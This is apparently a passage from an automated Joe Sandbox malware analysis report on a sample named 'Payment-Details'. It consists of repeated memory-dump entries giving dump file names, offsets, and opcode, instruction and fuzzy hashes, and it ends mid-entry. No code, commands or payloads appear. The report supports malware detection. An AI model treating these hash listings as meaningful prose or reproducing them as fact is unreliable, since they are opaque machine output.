                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d04478f1c5753c0b4cd230623cf072bf141efd36afc6f5379c57499f437e3379
                                        • Instruction ID: f27fb3c20a76c812d75124a05231f9c77b9b903d84cfc0758ec77ab1332b5409
                                        • Opcode Fuzzy Hash: d04478f1c5753c0b4cd230623cf072bf141efd36afc6f5379c57499f437e3379
                                        • Instruction Fuzzy Hash: 73E012B4D18208EFCB84EFE8D84939CBBF9EB09205F5041AADD4993350E7305A80CB52
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07ee001765ad0567be21abe7c747a5294be4a049192ed51d374fbaafaee68de4
                                        • Instruction ID: f8d95a0c7e6578bd03a2de9817763c463508cbceb114bbdb0b922c6bbc8c241a
                                        • Opcode Fuzzy Hash: 07ee001765ad0567be21abe7c747a5294be4a049192ed51d374fbaafaee68de4
                                        • Instruction Fuzzy Hash: DCD0A7317582209FD304DBACE454ED83BF5DF49720F1541AAE608CB332C997CC428781
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7b67a0643b82474763cc326f496f367e38d352c36a2861de4f55f98edb5b6f9
                                        • Instruction ID: 614e9eea8f2e2749725951abf9ee5116b5d4aee8f3b8fe3874abf966d5cd870b
                                        • Opcode Fuzzy Hash: a7b67a0643b82474763cc326f496f367e38d352c36a2861de4f55f98edb5b6f9
                                        • Instruction Fuzzy Hash: 95E01270A01309EFCB40DFA5E90469DB7FDEB85200F108599D80CD3344EA356F049BA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 729c7d20d9678927fbea23d732468ab670b08e8128db38277ed4025a18fa28e5
                                        • Instruction ID: be18c62d01d8a00202851230476407274cdb1afd9bdf60aff555649a7cb59bb8
                                        • Opcode Fuzzy Hash: 729c7d20d9678927fbea23d732468ab670b08e8128db38277ed4025a18fa28e5
                                        • Instruction Fuzzy Hash: 58D0A774908208EFCB84CF98E851B6AB3FCEB46218F10809CDD1C63762CE329D42C791
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction ID: c4832e7db6a9f7dbb93d2965c50ce9e37caf3f32e5587aa15de28926c408a796
                                        • Opcode Fuzzy Hash: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction Fuzzy Hash: 41D0A7F0918208EBCB44CB99D840B69B3BDDB47214F10C1ACEC0953361CB729D43D780
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction ID: 5cb48420a83e61e230b9e81a941ab12636e019a25fb6dd85d171ed6be5debc09
                                        • Opcode Fuzzy Hash: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction Fuzzy Hash: 6ED0A7F0518208EBC744DB98D850B69B7FCDB4B218F10849DD80C53361DAB2AD82CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfe8c13df042d568bcc770aaedfd53c0a75f19cb7d631df8a131268fe023e9dc
                                        • Instruction ID: f4babdc9edda966b8c8319ee199d9bc7fc6e6095405429c85ea2f8cf61262b32
                                        • Opcode Fuzzy Hash: cfe8c13df042d568bcc770aaedfd53c0a75f19cb7d631df8a131268fe023e9dc
                                        • Instruction Fuzzy Hash: 8AE0E5B0A00219CBEB549B64EC59BA9BA72FB4A300F104299D91EB3384CB702DC4CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c03a98b89422bf430ad6d01c6a82d786e7c42acf29e47165149a120a7c823b73
                                        • Instruction ID: 04c4482d526852b7391bd9ce3c7408d96a21f0d08aa108b72650bc6518fc0e4e
                                        • Opcode Fuzzy Hash: c03a98b89422bf430ad6d01c6a82d786e7c42acf29e47165149a120a7c823b73
                                        • Instruction Fuzzy Hash: 9DE01AB09002148BD790DF60D859BADB772EB4A300F408099DA0E73394CB306DC1CF55
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a7a1cffbb7bcda0204b2dc8a126e130d199ca7edac504cae1f2d2ce5a520b0c
                                        • Instruction ID: 1ec0eb3a445bcb6389f9f091638181f06a21c7a7879729573f68f3de594fac29
                                        • Opcode Fuzzy Hash: 4a7a1cffbb7bcda0204b2dc8a126e130d199ca7edac504cae1f2d2ce5a520b0c
                                        • Instruction Fuzzy Hash: B9E0E570910218CBD750DBA0E858B9DBB72FB89341F104099D90EA7389CB302D84CF64
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd4630785ff321644c1369bd612c4051e11470b479cbb92ea6bbd17407e39d64
                                        • Instruction ID: 039885b8c80c6698b148f57c58fb4caa36a04f774319a056a3a966efa16a9c1b
                                        • Opcode Fuzzy Hash: dd4630785ff321644c1369bd612c4051e11470b479cbb92ea6bbd17407e39d64
                                        • Instruction Fuzzy Hash: B8E01A74A043199FCB94DF54D8483ADB776EB8A310F108099898E73384CE706DC8CF26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af152bb9a653dcb97c469befdda30f6370cc262085503b9c56aca995b3408f70
                                        • Instruction ID: b891f635a25a1da113c9eb8accec7c627ac848cff91ebdef257c072174c5db25
                                        • Opcode Fuzzy Hash: af152bb9a653dcb97c469befdda30f6370cc262085503b9c56aca995b3408f70
                                        • Instruction Fuzzy Hash: C8E01A749002188FD790DF54DC587ADB7B6EB49300F009299C90E73384CA706DC8CF69
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2aba9292da0aa310a405d6e1021f5a1b8bcb6050cea546eaaa25c7d55e4ef47
                                        • Instruction ID: b3576809148b97cc663a3b6c6dd6a548f5a6dac6a5ff0535dd8fea7e6ea328e6
                                        • Opcode Fuzzy Hash: b2aba9292da0aa310a405d6e1021f5a1b8bcb6050cea546eaaa25c7d55e4ef47
                                        • Instruction Fuzzy Hash: ACE01A74A102188BC754DF50D95879DBBB2FB8A340F008199D90FB3394CB705D80CF65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c253d2f7b0776c6c13565cb8f6c4a20129435e3dc69eafce9f03cdf63d8eb6b7
                                        • Instruction ID: 466e843704959424e2be1d84c141a7bdc13f813d21b2b1cc4c03998ec952f508
                                        • Opcode Fuzzy Hash: c253d2f7b0776c6c13565cb8f6c4a20129435e3dc69eafce9f03cdf63d8eb6b7
                                        • Instruction Fuzzy Hash: 37E0E574A013188BD7509B64DCA9B9DB772FB85311F0001999A0EA3394CA302DC08F25
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43c5d9bd32e1bb83d4c637515113be121d0623d5b554dff2e2a475a04003cc6b
                                        • Instruction ID: 80ae370812c2eaf266f87b5fac0b4f0fa38e01a3c202b38116125d4b16d803a4
                                        • Opcode Fuzzy Hash: 43c5d9bd32e1bb83d4c637515113be121d0623d5b554dff2e2a475a04003cc6b
                                        • Instruction Fuzzy Hash: BFE0E570920254CBCB50EB54D8687AABAB2FB49300F0000A9990A63284CB342D80CF11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e1056346a86c71b9a06b0ce1e824006f98d023d5009bb84ee03ac3ee4c47bfa
                                        • Instruction ID: 4431f6bfe74af803cb2490e698b0d3e3c33d392d1c0883280c00fadbd6c0da51
                                        • Opcode Fuzzy Hash: 9e1056346a86c71b9a06b0ce1e824006f98d023d5009bb84ee03ac3ee4c47bfa
                                        • Instruction Fuzzy Hash: 79E0E5B4A01214CFD750DB54E858BA9B7B6EB8A300F119098C90AA3284CA302D84CF25
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0dbae9b5485762730a8aa3edf8dbb2dfdb4d9d9ea9f6a38c2e6e72536259655c
                                        • Instruction ID: 51ba808729ddf4bdaa53a17c46fe2247b765c5661f2aa3149ec00649f6410fd5
                                        • Opcode Fuzzy Hash: 0dbae9b5485762730a8aa3edf8dbb2dfdb4d9d9ea9f6a38c2e6e72536259655c
                                        • Instruction Fuzzy Hash: 86E01AB4A102188BC750EFA1D8587ADB772FB8A301F00419AD90E73384CB301D80CF65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6f056824b45df08b20d7b8ca15e41513dffce4a2caa6f4e5216d34c59af03c6
                                        • Instruction ID: 759b3483470f8c4090f7a4cd3ee9db05eb7d5a7020e1136d3c249dc921cd0dc2
                                        • Opcode Fuzzy Hash: c6f056824b45df08b20d7b8ca15e41513dffce4a2caa6f4e5216d34c59af03c6
                                        • Instruction Fuzzy Hash: 8FD0A93000AAC5CFC70283688C628D4BF78DD0322036940CAE88887143E322682ED761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e304c4ac49000bc22bd53516449b0ff84b415dcbea5c396ca6fd5b07a68cd2e0
                                        • Instruction ID: 486d1f565674f24ff4db231aacc36fa45c6df4efce76c5019e0f8a25043ad10b
                                        • Opcode Fuzzy Hash: e304c4ac49000bc22bd53516449b0ff84b415dcbea5c396ca6fd5b07a68cd2e0
                                        • Instruction Fuzzy Hash: 0CE0EDB4D0011A8FCB60CF58D884BADBBB5FB48300F0041AAD959A3740E7345D80DF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d989f8d5c78d944dc37fa6d8d76466ebc68fdac19ec6a27fb4c531ddd53cc118
                                        • Instruction ID: 0646f2255e97f42750bca46fd7f0aa4b46bf094ea57e5c5fc5ffce1fb9067be2
                                        • Opcode Fuzzy Hash: d989f8d5c78d944dc37fa6d8d76466ebc68fdac19ec6a27fb4c531ddd53cc118
                                        • Instruction Fuzzy Hash: BBD0A770815308EBD794DB65C90077EB3BEDB03110F50009CD61422B11DF715960C780
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b619c5bda39221a95a7125920864eb901df20c45ae4af78405a496a2cbce703
                                        • Instruction ID: 0b799fe734f388e79ab98800fe9007602e8e9a69e85d5515edd712534deae946
                                        • Opcode Fuzzy Hash: 9b619c5bda39221a95a7125920864eb901df20c45ae4af78405a496a2cbce703
                                        • Instruction Fuzzy Hash: FED01232058354EFC3038F90F8948E97FB5AF0A62075881A3F60C8A053E736A965DF99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcd01a76ab5f3c6a4eba90c4027b4378533bb145deb6589834e7250b7da4f6e7
                                        • Instruction ID: 24a7d28b33c8d13ecb66c33b0c749e5eb084fbfc26131ec45cb71d57a9285bfa
                                        • Opcode Fuzzy Hash: fcd01a76ab5f3c6a4eba90c4027b4378533bb145deb6589834e7250b7da4f6e7
                                        • Instruction Fuzzy Hash: 72D0123640D3E00EDB03937555150D97F70DD6325131940D7D2C5CA457C2240825E3E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f5d82cd05f451d2c48ecc76891c2d1205af413a435725fd4ee020893f77ce5d
                                        • Instruction ID: 89fdbeb7b3191620cfb9a45ab924b1ae5f8eb8f70c6ed87b079e0dbb16fb493e
                                        • Opcode Fuzzy Hash: 1f5d82cd05f451d2c48ecc76891c2d1205af413a435725fd4ee020893f77ce5d
                                        • Instruction Fuzzy Hash: 5BD052321083C49FC3039B24E450885BFB0AE0B22031940C2E9888F223C22299A6DB82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47d6914aca4d9f6f8c80d1001619615afcb100f7bf5e128754bf0ffdbe0c39bc
                                        • Instruction ID: f3c5afcac086e3b81c3edd0943bc03b472a0387696bec12690845da2832792b2
                                        • Opcode Fuzzy Hash: 47d6914aca4d9f6f8c80d1001619615afcb100f7bf5e128754bf0ffdbe0c39bc
                                        • Instruction Fuzzy Hash: E5D05E350091815FC302C750C4A0495FF359F47224718C4CAD9948B253C7269813DB01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61cde7e9b4f341886d23678e569db92b54202b79193b4664732ec5e04c76b10a
                                        • Instruction ID: d17f3d7e0804d6b8b813bfbfbeecd9ca0c2c62c9eaff2a808817781ffb30bf91
                                        • Opcode Fuzzy Hash: 61cde7e9b4f341886d23678e569db92b54202b79193b4664732ec5e04c76b10a
                                        • Instruction Fuzzy Hash: 63D0CA292082C49FDB131A302862BE63FA40B0B210F0902C2E0C08A8D3C64805C083B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83024f5e7df52b34bfe97291daff3407d8ad5cdb428b7c012b116ab263b0a463
                                        • Instruction ID: 768e1293452395c27b28ce4b78fa6a1c80a11cc7f921b91c3db3f2b5b24aed2c
                                        • Opcode Fuzzy Hash: 83024f5e7df52b34bfe97291daff3407d8ad5cdb428b7c012b116ab263b0a463
                                        • Instruction Fuzzy Hash: F9C012323101258BC704AB6CE414D9977ED9B89B24B1581AAEA09CB362CAA3EC0047C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b810fd98ce5104b8b4e2c7f4ca19d72910da515aab492dbb70e7cf782b2435a
                                        • Instruction ID: b8c42a8c8a319b7de9a0709a87b217473910a0c4fd67b07abbad5ca1bfbdec09
                                        • Opcode Fuzzy Hash: 5b810fd98ce5104b8b4e2c7f4ca19d72910da515aab492dbb70e7cf782b2435a
                                        • Instruction Fuzzy Hash: BFE0BD38805228CFDB609F11DC48BE8BBB9BB48301F5080E5C409A3251C7355B89DF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 200007d5738f2816bd9aecf41144aa843371005adab2a42251cc10560b5f8c06
                                        • Instruction ID: b448dbc102e50d79a9ca0301a336e0d06646437b82b690ba078f32f1eab5207d
                                        • Opcode Fuzzy Hash: 200007d5738f2816bd9aecf41144aa843371005adab2a42251cc10560b5f8c06
                                        • Instruction Fuzzy Hash: 77D05EB0614329CFCB25CB34D84479A77BAFB89300F0096A5940963248DB740E428F82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1fa4fca89375c4e3876baf517a4812c287ed60d9a3688372d9e92524d48cb17c
                                        • Instruction ID: 6651aeb783d9b555b034edea446a262df6bb9b0a9f6788e181442a702cde5425
                                        • Opcode Fuzzy Hash: 1fa4fca89375c4e3876baf517a4812c287ed60d9a3688372d9e92524d48cb17c
                                        • Instruction Fuzzy Hash: E0E017F4E10218CFEB14CF64E840B9CBBB1EF0A300F0081D6E409A3310CB344A808F11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82c068834acbeb315931a4112f08f84ce938fb5ceb13f428dfdc828cae53a3cb
                                        • Instruction ID: f84f9c6698da959932dda815b337b654544a4acc441eb053b36816019fbd9315
                                        • Opcode Fuzzy Hash: 82c068834acbeb315931a4112f08f84ce938fb5ceb13f428dfdc828cae53a3cb
                                        • Instruction Fuzzy Hash: 5CC02BF208D30483D31013446D0C3B973DCE707206FC01A009A0D104B38A6018C5D9B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e80f9a9cb2c48ad0a6b970d8fbdf57c9835f01045b21ce56bbca2da8e4486d38
                                        • Instruction ID: 4d8f13da6d8a340e230399bed7daf760fda2014d50d495bfcd21f5baa6af4738
                                        • Opcode Fuzzy Hash: e80f9a9cb2c48ad0a6b970d8fbdf57c9835f01045b21ce56bbca2da8e4486d38
                                        • Instruction Fuzzy Hash: E9D0127150D3C19FC7074720D4154A97FB2DFD230572685EAD08086262C63D9C22DF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c2e84e58220e5e2e7922cbd5036863a6f3144ff7137d4540085b3243d30385c
                                        • Instruction ID: 3ff3d1f38ac9e9e79ccdbebd4316cdb44aa5e9c474a954080c6fbe8f3e486a1b
                                        • Opcode Fuzzy Hash: 9c2e84e58220e5e2e7922cbd5036863a6f3144ff7137d4540085b3243d30385c
                                        • Instruction Fuzzy Hash: 80D0A770809366CBC711CB24ED147857768FB41310F0497DE541873151D7F11E808F02
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3cb925b90dd166de447113280eed96f8de2b46b67c9c26067cdf36376d8dd5c0
                                        • Instruction ID: ab43d8abf1daaf9fa63c0a54469de9fd0b919f4cee231550705965e358f53138
                                        • Opcode Fuzzy Hash: 3cb925b90dd166de447113280eed96f8de2b46b67c9c26067cdf36376d8dd5c0
                                        • Instruction Fuzzy Hash: D2D048B8A052298FCB24DF20D988A9EBBB5FB19301F0091D5D91AA3341C7705E818E54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c728ca4cfcb19d180836eb84d594788a4d70312e359c5c606191ea6aba104bb4
                                        • Instruction ID: 2593a8587267b30f37ca15b2a7b0b5f83575504867fc6b688f20d988b5cd35a1
                                        • Opcode Fuzzy Hash: c728ca4cfcb19d180836eb84d594788a4d70312e359c5c606191ea6aba104bb4
                                        • Instruction Fuzzy Hash: A0C08C71440304CBE721B7F9AC0C32876AAEB05A02FC00114E30C504328A740080CE76
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22763bbda97095f1ed5e24019d9bd8e470968a5b9e67b798f2d9bfc3adc2e229
                                        • Instruction ID: bb802cdc77149eed202c8136c301e3f25d4605178e27c699ee81b68061b8ce1a
                                        • Opcode Fuzzy Hash: 22763bbda97095f1ed5e24019d9bd8e470968a5b9e67b798f2d9bfc3adc2e229
                                        • Instruction Fuzzy Hash: 46D05EB8D11004CBEB00DF61DC04B58B7B5FB45300F00419AD509A3294C7301D80CF11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 383c60b28a3f04578474a255524f6ba530e5191975d32611fcdc49e466d0c9d1
                                        • Instruction ID: 910e5bb9c1d2dee587564cbde194a83754f66138d737fdf39bfd9e0632ec51db
                                        • Opcode Fuzzy Hash: 383c60b28a3f04578474a255524f6ba530e5191975d32611fcdc49e466d0c9d1
                                        • Instruction Fuzzy Hash: 02C04C76E1012E9BCF00DBD9F9508DCFB74EF94321F404036D214A7104D6301526CF58
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26b6bc8a2c822461ecfe6c664196ad727167b46844e35668d6198a70755c6aee
                                        • Instruction ID: b28865d61791e4c70b9a8ccd78370ed1d4d33ad833231c4765c5beb1cbb1177e
                                        • Opcode Fuzzy Hash: 26b6bc8a2c822461ecfe6c664196ad727167b46844e35668d6198a70755c6aee
                                        • Instruction Fuzzy Hash: 15C08CB01101048BD3006BA1E45C33EBA32E74A310F5080149A03222D4CAB40C848795
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                        • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                        • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
